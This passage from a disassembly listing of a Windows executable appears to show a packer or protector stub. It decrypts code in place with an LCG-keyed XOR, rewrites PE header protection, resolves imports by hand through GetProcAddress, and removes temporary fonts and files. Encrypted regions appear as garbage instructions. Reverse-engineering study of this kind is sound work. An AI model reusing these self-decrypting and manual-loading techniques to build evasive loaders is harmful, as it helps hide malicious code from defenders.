mov eax, [ebp+var_20]
mov [ebp+var_28], eax
mov ecx, [ebp+var_28]
mov edx, [ecx+14h]
shl edx, 4
mov eax, [ebp+var_28]
mov ecx, [eax+4]
add ecx, edx
mov [ebp+var_34], ecx
mov edx, [ebp+var_34]
mov eax, [edx]
mov [ebp+var_30], eax
jmp loc_50450D
; ---------------------------------------------------------------------------
loc_5045F9: ; CODE XREF: sub_504490+8A�j
cmp [ebp+var_30], 0
jnz short loc_504601
jmp short loc_50467C
; ---------------------------------------------------------------------------
loc_504601: ; CODE XREF: sub_504490+16D�j
mov ecx, ds:dword_511908
mov edx, [ecx+0Ch]
shl edx, 4
mov eax, [ebp+var_1C]
add eax, edx
mov [ebp+var_24], eax
mov ecx, [ebp+var_24]
mov edx, [ebp+var_34]
mov [ecx], edx
mov eax, [ebp+var_24]
mov ecx, [ebp+var_28]
mov [eax+0Ch], ecx
mov edx, [ebp+var_24]
mov dword ptr [edx+8], 0
mov eax, [ebp+var_28]
mov ecx, [ebp+var_34]
sub ecx, [eax+4]
sar ecx, 4
mov edx, [ebp+var_28]
mov eax, [edx+8]
mov edx, [ebp+var_24]
mov eax, [eax+ecx*4]
mov [edx+4], eax
mov ecx, [ebp+var_24]
mov edx, [ecx+4]
mov [ebp+var_2C], edx
mov eax, ds:dword_511908
mov ecx, [eax+0Ch]
add ecx, 1
mov edx, ds:dword_511908
mov [edx+0Ch], ecx
mov eax, [ebp+var_28]
mov ecx, [eax+14h]
add ecx, 1
mov edx, [ebp+var_28]
mov [edx+14h], ecx
jmp loc_5044EB
; ---------------------------------------------------------------------------
loc_50467C: ; CODE XREF: sub_504490+16F�j
mov eax, ds:dword_511908
mov ecx, [ebp+var_1C]
mov [eax+8], ecx
mov [ebp+var_1C], 0
mov [ebp+var_4], 0FFFFFFFFh
call sub_50469C
jmp short loc_5046B5
sub_504490 endp
; =============== S U B R O U T I N E =======================================
sub_50469C proc near ; CODE XREF: sub_504490+205�p
; DATA XREF: _6:0050E438�o
cmp dword ptr [ebp-1Ch], 0
jz short locret_5046B4
mov edx, [ebp-1Ch]
mov [ebp-44h], edx
mov eax, [ebp-44h]
push eax
call sub_5083DD
add esp, 4
locret_5046B4: ; CODE XREF: sub_50469C+4�j
retn
sub_50469C endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_504490
loc_5046B5: ; CODE XREF: sub_504490+20A�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_504490
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_5046D0 proc near ; CODE XREF: sub_50A0C8+77�p
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
; FUNCTION CHUNK AT 005047AE SIZE 00000011 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_50E440
push offset sub_4FC54C
mov eax, large fs:0
push eax
mov large fs:0, esp
add esp, 0FFFFFFE4h
push ebx
push esi
push edi
mov eax, ds:dword_5118E8
mov [ebp+var_24], eax
cmp [ebp+var_24], 0
jz short loc_504714
mov ecx, [ebp+var_24]
add ecx, 10h
push ecx
call ds:dword_50E01C ; RtlEnterCriticalSection
mov byte ptr [ebp+var_28], 1
jmp short loc_504718
; ---------------------------------------------------------------------------
loc_504714: ; CODE XREF: sub_5046D0+2F�j
mov byte ptr [ebp+var_28], 0
loc_504718: ; CODE XREF: sub_5046D0+42�j
mov edx, [ebp+var_28]
and edx, 0FFh
test edx, edx
jz loc_5047AE
mov [ebp+var_4], 0
cmp ds:dword_5118E8, 0
jz short loc_504783
mov ecx, ds:dword_5118E8
call sub_50BA67
loc_504744: ; CODE XREF: sub_5046D0:loc_504781�j
lea eax, [ebp+var_1C]
push eax
lea ecx, [ebp+var_20]
push ecx
mov ecx, ds:dword_5118E8
call sub_50BA7E
and eax, 0FFh
test eax, eax
jz short loc_504783
mov edx, [ebp+var_1C]
cmp dword ptr [edx], 0
jnz short loc_504781
mov eax, [ebp+var_20]
mov ecx, [eax]
push ecx
call ds:dword_5117EC ; RemoveFontResourceA
mov edx, [ebp+var_1C]
mov eax, [edx+4]
push eax
call ds:dword_5116C0 ; DeleteFileA
loc_504781: ; CODE XREF: sub_5046D0+96�j
jmp short loc_504744
; ---------------------------------------------------------------------------
loc_504783: ; CODE XREF: sub_5046D0+67�j
; sub_5046D0+8E�j
mov [ebp+var_4], 0FFFFFFFFh
call sub_504791
jmp short loc_5047AE
sub_5046D0 endp
; =============== S U B R O U T I N E =======================================
sub_504791 proc near ; CODE XREF: sub_5046D0+BA�p
; DATA XREF: _6:0050E448�o
mov ecx, ds:dword_5118E8
mov [ebp-2Ch], ecx
cmp dword ptr [ebp-2Ch], 0
jz short locret_5047AD
mov edx, [ebp-2Ch]
add edx, 10h
push edx
call ds:dword_50E018 ; RtlLeaveCriticalSection
locret_5047AD: ; CODE XREF: sub_504791+D�j
retn
sub_504791 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_5046D0
loc_5047AE: ; CODE XREF: sub_5046D0+53�j
; sub_5046D0+BF�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_5046D0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_5047BF proc near ; CODE XREF: _5:005048A9�p
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0050488E SIZE 0000000F BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_50E450
push offset sub_4FC54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 1Ch
push ebx
push esi
push edi
mov [ebp+var_34], edx
mov [ebp+var_30], ecx
mov eax, offset dword_4FD720
push dword ptr [eax+4]
call ds:dword_5116C4 ; RtlEnterCriticalSection
and [ebp+var_4], 0
mov eax, [ebp+var_30]
mov eax, [eax]
mov [ebp+var_24], eax
mov eax, [ebp+var_30]
mov eax, [eax-4]
mov [ebp+var_2C], eax
mov eax, [ebp+var_24]
and eax, 0FFFFh
mov ecx, [ebp+var_2C]
sub ecx, eax
mov [ebp+var_1C], ecx
mov eax, [ebp+var_24]
shr eax, 10h
mov ecx, [ebp+var_2C]
add ecx, eax
mov [ebp+var_28], ecx
mov eax, [ebp+var_1C]
mov [ebp+var_20], eax
jmp short loc_50483A
; ---------------------------------------------------------------------------
loc_504833: ; CODE XREF: sub_5047BF+9D�j
mov eax, [ebp+var_1C]
inc eax
mov [ebp+var_1C], eax
loc_50483A: ; CODE XREF: sub_5047BF+72�j
mov eax, [ebp+var_1C]
cmp eax, [ebp+var_28]
jz short loc_50485E
mov eax, [ebp+var_1C]
imul eax, 19660Dh
add eax, 3C6EF35Fh
mov ecx, [ebp+var_1C]
mov cl, [ecx]
xor cl, al
mov eax, [ebp+var_1C]
mov [eax], cl
jmp short loc_504833
; ---------------------------------------------------------------------------
loc_50485E: ; CODE XREF: sub_5047BF+81�j
mov eax, [ebp+var_28]
sub eax, [ebp+var_20]
push eax
push [ebp+var_20]
push ds:dword_51168C
call ds:dword_511670 ; FlushInstructionCache
or [ebp+var_4], 0FFFFFFFFh
call sub_50487F
jmp short loc_50488E
sub_5047BF endp
; =============== S U B R O U T I N E =======================================
sub_50487F proc near ; CODE XREF: sub_5047BF+B9�p
; DATA XREF: _6:0050E458�o
mov eax, offset dword_4FD720
push dword ptr [eax+4]
call ds:dword_511754 ; RtlLeaveCriticalSection
retn
sub_50487F endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_5047BF
loc_50488E: ; CODE XREF: sub_5047BF+BE�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
; END OF FUNCTION CHUNK FOR sub_5047BF
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ebx
push esi
push edi
pusha
xor edx, edx
lea ecx, [ebp+8]
call sub_5047BF
popa
pop edi
pop esi
pop ebx
pop ebp
retn 4
; ---------------------------------------------------------------------------
loc_5048B6: ; CODE XREF: _5:004FDB88�j
mov ecx, 0EF000008h
call sub_508342
loc_5048C0: ; CODE XREF: sub_504DC0+12A�p
push ebp
mov ebp, esp
sub esp, 0F8h
push ebx
push esi
push edi
cmp dword ptr [ebp+0Ch], 0
jz loc_50498A
push 300000h
call near ptr loc_4FDB7D+1
das
pop esp
jmp far ptr 0ACF4h:78C07626h
; ---------------------------------------------------------------------------
db 79h, 51h, 0C5h
dd 0D3767C0Eh, 9A3C1583h, 61222F3Ch, 569A14B2h, 51ACF93Bh
dd 795DE1D6h, 8AC55F6Ch, 6E1F4C7h, 0DDEA9A95h, 847AACBFh
dd 6408A2E6h, 0EFA72036h, 0DEAD53CBh, 0D9318176h, 7A25BFCCh
dd 66815367h, 3D4A3AD5h, 24DA4C5Fh, 0C468C286h, 0A179C1BCh
dd 52068794h, 4B34FCBFh, 5121FE3h, 0D1F96FEFh, 627220C4h
dd 0B1617C44h, 5A424F31h, 7B38D747h, 0B9CB6DC2h, 99A668AAh
dd 1F06D28Ch, 313E4B8Bh, 3278658Bh, 0DED6E3F0h, 95A2B3C9h
dd 9E91AF1Fh, 433950ABh, 90901320h, 0C985C933h
db 75h, 0EEh
; ---------------------------------------------------------------------------
loc_50498A: ; CODE XREF: _5:005048D0�j
cmp dword ptr [ebp+8], 0
jz loc_504A9D
mov dword ptr [ebp-0E4h], 0
push 5F0000h
call near ptr loc_4FDB7D+1
ja short loc_504A0E
xor bl, ah
sahf
cli
inc eax
lodsb
les ebx, [ecx] ; CODE XREF: _5:005049B2�j
jns short near ptr loc_5049B0+1
into
test [esi+5C4DBBE2h], bl
; ---------------------------------------------------------------------------
db 0FEh
; ---------------------------------------------------------------------------
adc al, 7
cli
cdq
mov cl, [esi+eax*8]
mov ecx, 0F36FEBACh
add cl, [esi+ebx*2+58434451h]
retn 310h
; ---------------------------------------------------------------------------
dw 9DF6h
dd 0DFB43472h, 818E9B43h, 4DB11D00h, 0E893340h, 1A0D3981h
dd 0C745F0A4h, 7D8A64DEh, 0BA241770h, 63222F3Ch, 0E1EE187Ah
dd 521A50D4h, 0F1916C2Ch, 2A525F02h, 6B33E757h
db 29h
byte_504A0D db 7Dh ; CODE XREF: _5:00504A36�j
; ---------------------------------------------------------------------------
loc_504A0E: ; CODE XREF: _5:005049A8�j
sti
test eax, 0A9B628A2h
pushf
loc_504A15: ; CODE XREF: _5:00504A20�j
sti
enter 68AAh, 5Bh
dec esi
cmp eax, 4F6ED00Dh
jecxz short loc_504A15
out 0D9h, al
mov eax, 65B38C81h
loc_504A29: ; CODE XREF: _5:00504A49�j
xchg esp, ds:0C1542B53h[eax]
cmp al, 78h
bound edi, [ebx+1Bh]
out dx, eax
loop near ptr byte_504A0D
mov esi, 94A141C9h
xchg ecx, [esi]
pop es
mov edx, [ebx+46h]
cmp [ecx-7199795h], eax
jmp short loc_504A29
; ---------------------------------------------------------------------------
db 7Eh
dd 9D45C5B6h, 1DD88390h, 35429036h, 6A19B628h, 0B1251884h
dd 0A6DC5CFBh, 76E58A07h, 26C1E5ACh, 2F5D25Ch, 36296F67h
dd 0FB59B843h, 90907B88h, 0C085C033h, 8D8BEE75h, 0FFFFFF1Ch
dd 0FF088D89h, 958BFFFFh, 0FFFFFF08h, 3943E852h, 0C4830000h
db 4
; ---------------------------------------------------------------------------
loc_504A9D: ; CODE XREF: _5:0050498E�j
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 10h
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_504AB0 proc near ; CODE XREF: sub_504D70+29�p
; sub_504DC0+234�p
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3A = byte ptr -3Ah
var_39 = byte ptr -39h
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 48h
mov [ebp+var_4], 1
mov [ebp+var_8], 0
jmp short loc_504ACC
; ---------------------------------------------------------------------------
loc_504AC3: ; CODE XREF: sub_504AB0+106�j
; sub_504AB0+2A8�j
mov eax, [ebp+var_8]
add eax, 1
mov [ebp+var_8], eax
loc_504ACC: ; CODE XREF: sub_504AB0+11�j
mov ecx, [ebp+var_8]
imul ecx, 14h
mov edx, [ebp+arg_0]
cmp dword ptr [edx+ecx+0Ch], 0
jnz short loc_504AE1
jmp loc_504D5D
; ---------------------------------------------------------------------------
loc_504AE1: ; CODE XREF: sub_504AB0+2A�j
mov eax, [ebp+var_8]
imul eax, 14h
mov ecx, [ebp+arg_0]
mov edx, [ebp+arg_4]
add edx, [ecx+eax]
mov [ebp+var_C], edx
mov eax, [ebp+var_8]
imul eax, 14h
mov ecx, [ebp+arg_0]
mov edx, [ebp+arg_4]
add edx, [ecx+eax+10h]
mov [ebp+var_20], edx
mov eax, [ebp+arg_8]
mov ecx, [ebp+var_C]
cmp ecx, [eax+34h]
jnz short loc_504B19
mov edx, [ebp+var_20]
mov [ebp+var_C], edx
jmp short loc_504B27
; ---------------------------------------------------------------------------
loc_504B19: ; CODE XREF: sub_504AB0+5F�j
mov eax, [ebp+var_C]
cmp eax, [ebp+arg_4]
jnz short loc_504B27
mov ecx, [ebp+var_20]
mov [ebp+var_C], ecx
loc_504B27: ; CODE XREF: sub_504AB0+67�j
; sub_504AB0+6F�j
mov [ebp+var_14], 0
mov edx, [ebp+var_8]
imul edx, 14h
mov eax, [ebp+arg_0]
mov ecx, [ebp+arg_4]
add ecx, [eax+edx+0Ch]
mov [ebp+var_24], ecx
cmp [ebp+arg_14], 0
jz short loc_504B5A
mov edx, [ebp+var_24]
push edx
mov eax, [ebp+arg_14]
push eax
call sub_50575D
add esp, 8
mov [ebp+var_14], eax
loc_504B5A: ; CODE XREF: sub_504AB0+95�j
cmp [ebp+var_14], 0
jnz short loc_504B6C
mov ecx, [ebp+var_24]
push ecx
call sub_50AF8C
mov [ebp+var_14], eax
loc_504B6C: ; CODE XREF: sub_504AB0+AE�j
mov edx, [ebp+var_8]
imul edx, 14h
mov eax, [ebp+arg_0]
xor ecx, ecx
cmp dword ptr [eax+edx+4], 0FFFFFFFEh
setnz cl
mov byte ptr [ebp+var_1C], cl
mov edx, [ebp+var_8]
imul edx, 14h
mov eax, [ebp+arg_0]
cmp dword ptr [eax+edx+4], 0
jnz short loc_504B9F
mov ecx, [ebp+var_1C]
and ecx, 0FFh
test ecx, ecx
jz short loc_504BDD
loc_504B9F: ; CODE XREF: sub_504AB0+E0�j
mov edx, [ebp+arg_10]
and edx, 0FFh
test edx, edx
jz short loc_504BBD
cmp [ebp+var_14], 0
jnz short loc_504BBB
mov [ebp+var_4], 0
jmp loc_504AC3
; ---------------------------------------------------------------------------
loc_504BBB: ; CODE XREF: sub_504AB0+100�j
jmp short loc_504BDD
; ---------------------------------------------------------------------------
loc_504BBD: ; CODE XREF: sub_504AB0+FA�j
mov eax, [ebp+var_24]
push eax
call sub_50AE83
mov [ebp+var_14], eax
cmp [ebp+var_14], 0
jnz short loc_504BDD
mov ecx, [ebp+var_24]
push ecx
push offset aTheDynamicLink ; "The dynamic link library '%s' could not"...
call sub_5084F7
loc_504BDD: ; CODE XREF: sub_504AB0+ED�j
; sub_504AB0:loc_504BBB�j ...
mov edx, ds:off_510BE8
mov [ebp+var_18], edx
mov eax, [ebp+arg_C]
mov ds:off_510BE8, eax
push 0
call ds:dword_511718 ; GetModuleHandleA
cmp eax, [ebp+arg_4]
jnz short loc_504C62
mov [ebp+var_34], offset aExecutable ; "EXECUTABLE"
mov ecx, [ebp+arg_C]
mov [ebp+var_38], ecx
loc_504C08: ; CODE XREF: sub_504AB0+18A�j
mov edx, [ebp+var_38]
mov al, [edx]
mov [ebp+var_39], al
mov ecx, [ebp+var_34]
cmp al, [ecx]
jnz short loc_504C45
cmp [ebp+var_39], 0
jz short loc_504C3C
mov edx, [ebp+var_38]
mov al, [edx+1]
mov [ebp+var_3A], al
mov ecx, [ebp+var_34]
cmp al, [ecx+1]
jnz short loc_504C45
add [ebp+var_38], 2
add [ebp+var_34], 2
cmp [ebp+var_3A], 0
jnz short loc_504C08
loc_504C3C: ; CODE XREF: sub_504AB0+16B�j
mov [ebp+var_40], 0
jmp short loc_504C4D
; ---------------------------------------------------------------------------
loc_504C45: ; CODE XREF: sub_504AB0+165�j
; sub_504AB0+17C�j
sbb edx, edx
sbb edx, 0FFFFFFFFh
mov [ebp+var_40], edx
loc_504C4D: ; CODE XREF: sub_504AB0+193�j
mov eax, [ebp+var_40]
mov [ebp+var_44], eax
cmp [ebp+var_44], 0
jz short loc_504C62
mov [ebp+var_48], 0
jmp short loc_504C69
; ---------------------------------------------------------------------------
loc_504C62: ; CODE XREF: sub_504AB0+149�j
; sub_504AB0+1A7�j
mov [ebp+var_48], 1
loc_504C69: ; CODE XREF: sub_504AB0+1B0�j
mov cl, byte ptr [ebp+var_48]
mov byte ptr [ebp+var_10], cl
jmp short loc_504C83
; ---------------------------------------------------------------------------
loc_504C71: ; CODE XREF: sub_504AB0:loc_504D3A�j
mov edx, [ebp+var_20]
add edx, 4
mov [ebp+var_20], edx
mov eax, [ebp+var_C]
add eax, 4
mov [ebp+var_C], eax
loc_504C83: ; CODE XREF: sub_504AB0+1BF�j
mov ecx, [ebp+var_20]
cmp dword ptr [ecx], 0
jz loc_504D3F
mov edx, [ebp+var_C]
cmp dword ptr [edx], 0
jz loc_504D3F
mov eax, [ebp+var_8]
imul eax, 14h
mov ecx, [ebp+arg_0]
cmp dword ptr [ecx+eax+4], 0
jnz short loc_504CB8
mov edx, [ebp+var_1C]
and edx, 0FFh
test edx, edx
jz short loc_504D16
loc_504CB8: ; CODE XREF: sub_504AB0+1F9�j
mov eax, [ebp+var_C]
mov ecx, [eax]
and ecx, 80000000h
test ecx, ecx
jnz short loc_504CEA
mov edx, [ebp+var_C]
mov eax, [ebp+arg_4]
add eax, [edx]
mov [ebp+var_28], eax
mov ecx, [ebp+var_28]
add ecx, 2
push ecx
mov edx, [ebp+var_14]
push edx
call ds:dword_511728 ; GetProcAddress
mov ecx, [ebp+var_20]
mov [ecx], eax
jmp short loc_504D16
; ---------------------------------------------------------------------------
loc_504CEA: ; CODE XREF: sub_504AB0+215�j
mov edx, [ebp+var_C]
mov eax, [edx]
and eax, 0FFFFh
mov [ebp+var_30], eax
mov ecx, [ebp+var_30]
push ecx
mov edx, [ebp+var_14]
push edx
call ds:dword_511728 ; GetProcAddress
mov [ebp+var_2C], eax
cmp [ebp+var_2C], 0
jz short loc_504D16
mov eax, [ebp+var_20]
mov ecx, [ebp+var_2C]
mov [eax], ecx
loc_504D16: ; CODE XREF: sub_504AB0+206�j
; sub_504AB0+238�j ...
mov edx, [ebp+var_10]
and edx, 0FFh
test edx, edx
jz short loc_504D3A
mov eax, [ebp+var_24]
push eax
mov ecx, ds:off_510BE8
push ecx
mov edx, [ebp+var_20]
push edx
call sub_5053D0
add esp, 0Ch
loc_504D3A: ; CODE XREF: sub_504AB0+271�j
jmp loc_504C71
; ---------------------------------------------------------------------------
loc_504D3F: ; CODE XREF: sub_504AB0+1D9�j
; sub_504AB0+1E5�j
mov eax, [ebp+var_18]
mov ds:off_510BE8, eax
mov ecx, [ebp+var_8]
imul ecx, 14h
mov edx, [ebp+arg_0]
mov dword ptr [edx+ecx+4], 0FFFFFFFEh
jmp loc_504AC3
; ---------------------------------------------------------------------------
loc_504D5D: ; CODE XREF: sub_504AB0+2C�j
mov al, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_504AB0 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_504D70 proc near ; CODE XREF: sub_505BD7+1B8�p
; sub_50614D+45�p
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = byte ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push ecx
mov eax, ds:dword_511914
add eax, 1
mov ds:dword_511914, eax
mov ecx, [ebp+arg_14]
push ecx
mov dl, [ebp+arg_10]
push edx
mov eax, [ebp+arg_C]
push eax
mov ecx, [ebp+arg_8]
push ecx
mov edx, [ebp+arg_4]
push edx
mov eax, [ebp+arg_0]
push eax
call sub_504AB0
add esp, 18h
mov [ebp+var_4], al
mov ecx, ds:dword_511914
sub ecx, 1
mov ds:dword_511914, ecx
mov al, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_504D70 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_504DC0 proc near ; CODE XREF: _5:004FE2A6�p
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 3Ch
mov [ebp+var_18], 0
call sub_502DD0
call sub_509DD4
call sub_4FC3F3
mov eax, ds:dword_511684
mov ecx, [eax+4]
mov [ebp+var_18], ecx
mov edx, [ebp+var_18]
mov eax, [ebp+var_18]
add eax, [edx+3Ch]
mov ds:dword_511910, eax
mov ecx, ds:dword_511910
cmp dword ptr [ecx], 4550h
jz short loc_504E0D
mov ecx, 0EF000002h
call sub_508342
loc_504E0D: ; CODE XREF: sub_504DC0+41�j
mov edx, ds:dword_511698
sub edx, 3
mov [ebp+var_4], edx
cmp ds:dword_511680, 1
jz short loc_504E37
lea eax, [ebp+var_8]
push eax
push 4
push 190h
mov ecx, [ebp+var_18]
push ecx
call ds:dword_5117AC ; VirtualProtect
loc_504E37: ; CODE XREF: sub_504DC0+60�j
mov [ebp+var_14], 0
jmp short loc_504E49
; ---------------------------------------------------------------------------
loc_504E40: ; CODE XREF: sub_504DC0+AF�j
; sub_504DC0:loc_504F6D�j
mov edx, [ebp+var_14]
add edx, 1
mov [ebp+var_14], edx
loc_504E49: ; CODE XREF: sub_504DC0+7E�j
mov eax, [ebp+var_14]
cmp eax, [ebp+var_4]
jnb loc_504F72
mov ecx, [ebp+var_14]
imul ecx, 28h
mov edx, ds:off_51169C
add edx, ecx
mov [ebp+var_20], edx
mov eax, [ebp+var_20]
cmp dword ptr [eax+0Ch], 0
jnz short loc_504E71
jmp short loc_504E40
; ---------------------------------------------------------------------------
loc_504E71: ; CODE XREF: sub_504DC0+AD�j
cmp [ebp+var_14], 20h
jnb short loc_504E98
mov edx, 1
mov ecx, [ebp+var_14]
shl edx, cl
mov eax, ds:dword_511684
mov ecx, [eax+10h]
and ecx, edx
test ecx, ecx
jz short loc_504E98
mov [ebp+var_34], 1
jmp short loc_504E9F
; ---------------------------------------------------------------------------
loc_504E98: ; CODE XREF: sub_504DC0+B5�j
; sub_504DC0+CD�j
mov [ebp+var_34], 0
loc_504E9F: ; CODE XREF: sub_504DC0+D6�j
mov edx, [ebp+var_34]
mov [ebp+var_28], edx
cmp [ebp+var_14], 20h
jnb short loc_504ECD
mov eax, 1
mov ecx, [ebp+var_14]
shl eax, cl
mov ecx, ds:dword_511684
mov edx, [ecx+14h]
and edx, eax
test edx, edx
jz short loc_504ECD
mov [ebp+var_38], 1
jmp short loc_504ED4
; ---------------------------------------------------------------------------
loc_504ECD: ; CODE XREF: sub_504DC0+E9�j
; sub_504DC0+102�j
mov [ebp+var_38], 0
loc_504ED4: ; CODE XREF: sub_504DC0+10B�j
mov eax, [ebp+var_38]
mov [ebp+var_2C], eax
mov ecx, [ebp+var_18]
push ecx
mov edx, [ebp+var_20]
push edx
mov eax, [ebp+var_2C]
push eax
mov ecx, [ebp+var_28]
push ecx
call loc_5048C0
mov edx, [ebp+var_20]
mov eax, [edx+24h]
and eax, 20000000h
test eax, eax
jz short loc_504F19
mov ecx, [ebp+var_20]
mov edx, [ecx+24h]
and edx, 80000000h
neg edx
sbb edx, edx
and edx, 20h
add edx, 20h
mov [ebp+var_3C], edx
jmp short loc_504F32
; ---------------------------------------------------------------------------
loc_504F19: ; CODE XREF: sub_504DC0+13C�j
mov eax, [ebp+var_20]
mov ecx, [eax+24h]
and ecx, 80000000h
neg ecx
sbb ecx, ecx
and ecx, 2
add ecx, 2
mov [ebp+var_3C], ecx
loc_504F32: ; CODE XREF: sub_504DC0+157�j
mov edx, [ebp+var_3C]
mov [ebp+var_24], edx
cmp ds:dword_511680, 1
jz short loc_504F6D
mov eax, ds:dword_511910
xor ecx, ecx
mov cx, [eax+14h]
mov edx, ds:dword_511910
lea eax, [edx+ecx+18h]
mov ecx, [ebp+var_14]
imul ecx, 28h
add eax, ecx
mov [ebp+var_30], eax
mov edx, [ebp+var_30]
mov eax, [ebp+var_20]
mov ecx, [eax+24h]
mov [edx+24h], ecx
loc_504F6D: ; CODE XREF: sub_504DC0+17F�j
jmp loc_504E40
; ---------------------------------------------------------------------------
loc_504F72: ; CODE XREF: sub_504DC0+8F�j
cmp ds:dword_511680, 1
jz short loc_504FA3
mov edx, ds:dword_511910
mov eax, ds:off_51169C
mov ecx, [eax-0Ch]
mov [edx+0ECh], ecx
mov edx, ds:dword_511910
mov eax, ds:off_51169C
mov ecx, [eax-8]
mov [edx+0E8h], ecx
loc_504FA3: ; CODE XREF: sub_504DC0+1B9�j
cmp ds:dword_511680, 1
jz short loc_504FC3
lea edx, [ebp+var_8]
push edx
mov eax, [ebp+var_8]
push eax
push 190h
mov ecx, [ebp+var_18]
push ecx
call ds:dword_5117AC ; VirtualProtect
loc_504FC3: ; CODE XREF: sub_504DC0+1EA�j
mov edx, ds:dword_511684
mov eax, [ebp+var_18]
add eax, [edx+8]
mov [ebp+var_C], eax
mov ds:dword_511914, 0
push 0
push 0
push offset aExecutable ; "EXECUTABLE"
mov ecx, ds:dword_511910
push ecx
mov edx, [ebp+var_18]
push edx
mov eax, [ebp+var_C]
push eax
call sub_504AB0
add esp, 18h
call sub_50613C
and eax, 0FFh
test eax, eax
jz short loc_50501F
loc_50500A: ; CODE XREF: sub_504DC0+258�j
call sub_50614D
and eax, 0FFh
test eax, eax
jz short loc_50501A
jmp short loc_50500A
; ---------------------------------------------------------------------------
loc_50501A: ; CODE XREF: sub_504DC0+256�j
call sub_50613C
loc_50501F: ; CODE XREF: sub_504DC0+248�j
push offset aImm32_dll ; "imm32.dll"
call ds:dword_511718 ; GetModuleHandleA
mov [ebp+var_1C], eax
cmp [ebp+var_1C], 0
jz short loc_505041
push offset aImm32_dll ; "imm32.dll"
mov ecx, [ebp+var_1C]
push ecx
call sub_505070
loc_505041: ; CODE XREF: sub_504DC0+271�j
push offset aOleoaut32_dll ; "oleoaut32.dll"
call ds:dword_511718 ; GetModuleHandleA
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jz short loc_505063
push offset aOleaout32_dll ; "oleaout32.dll"
mov edx, [ebp+var_10]
push edx
call sub_505070
loc_505063: ; CODE XREF: sub_504DC0+293�j
mov esp, ebp
pop ebp
retn
sub_504DC0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_505070 proc near ; CODE XREF: sub_504DC0+27C�p
; sub_504DC0+29E�p ...
var_2C = dword ptr -2Ch
var_28 = byte ptr -28h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 2Ch
mov eax, ds:dword_511914
add eax, 1
mov ds:dword_511914, eax
mov ecx, [ebp+arg_4]
mov ds:off_510BE8, ecx
push 9
lea ecx, [ebp+var_28]
call sub_50B77C
lea edx, [ebp+var_28]
push edx
push 0
mov eax, [ebp+arg_0]
push eax
call sub_5050D0
add esp, 0Ch
mov ecx, ds:dword_511914
sub ecx, 1
mov ds:dword_511914, ecx
mov [ebp+var_2C], 1
lea ecx, [ebp+var_28]
call sub_50B82A
mov eax, [ebp+var_2C]
mov esp, ebp
pop ebp
retn 8
sub_505070 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_5050D0 proc near ; CODE XREF: sub_505070+30�p
; sub_5050D0+24B�p
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
